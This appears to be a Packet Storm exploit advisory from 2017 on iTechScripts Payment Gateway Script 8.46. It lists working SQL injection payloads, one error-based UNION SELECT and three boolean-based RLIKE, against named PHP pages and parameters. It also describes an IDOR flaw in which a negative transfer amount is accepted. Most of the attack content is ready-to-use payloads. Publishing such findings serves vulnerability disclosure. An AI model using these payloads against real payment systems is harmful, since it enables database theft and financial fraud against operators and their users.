what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

iTechScripts Payment Gateway Script 8.46 SQL Injection

iTechScripts Payment Gateway Script 8.46 SQL Injection
Posted Jan 18, 2017
Authored by Hasan Emre Ozer

iTechScripts Payment Gateway Script version 8.46 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 823d7beb69eabd38cf5eb4a921317bf50edd69150bbb0db67ff3ac9e8222b9ba

iTechScripts Payment Gateway Script 8.46 SQL Injection

Change Mirror Download
Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 18/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/payment-gateway-script/
<http://itechscripts.com/image-sharing-script/>
Sofware Price and Demo : $400
http://payment-gateway.itechscripts.com
<http://photo-sharing.itechscripts.com/>

------------------------------------------------------

Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/user-profile.php
Vulnerable Parameters: token
Method: GET
Payload: -3519' UNION ALL SELECT
NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
------------------------------------------------------
Type: IDOR
Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php
Vulnerable Parameters: t_amount and t_paid
Method: POST
Payload: negative money value (ps:-1350)
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------

Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php
Vulnerable Parameters: token
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH
------------------------------------------------------
Type: Boolean Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/overview.php
Vulnerable Parameters: limit
Method: GET
Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN
0x343034306334636134323338613062393233383230646363353039613666373538343962
ELSE 0x28 END))-- BxvH


--
Best Regards,
Hasan Emre
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close